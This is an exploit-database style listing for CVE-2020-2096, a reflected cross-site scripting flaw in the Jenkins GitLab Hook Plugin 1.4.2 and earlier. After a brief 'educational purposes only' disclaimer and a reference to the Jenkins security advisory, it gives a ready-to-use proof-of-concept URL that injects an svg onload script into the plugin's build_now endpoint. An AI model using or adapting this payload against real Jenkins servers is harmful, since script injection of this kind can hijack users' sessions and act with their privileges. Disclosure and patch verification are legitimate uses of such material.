Jenkins gitlab hook plugin 1.4.2 reflected crosssite scripting Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2020-01-16 | Type : webapps | Platform : java
This exploit / vulnerability Jenkins gitlab hook plugin 1.4.2 reflected crosssite scripting is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

# Exploit Title: Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting
# Exploit Author: Ai Ho
# Vendor Homepage : https://jenkins.io/
# Effective version : Gitlab Hook Plugin 1.4.2 and earlier
# References: https://jenkins.io/security/advisory/2020-01-15/
# CVE: CVE-2020-2096

# PoC:
http://JENKINS_IP/gitlab/build_now%3Csvg/onload=alert(document.domain)%3E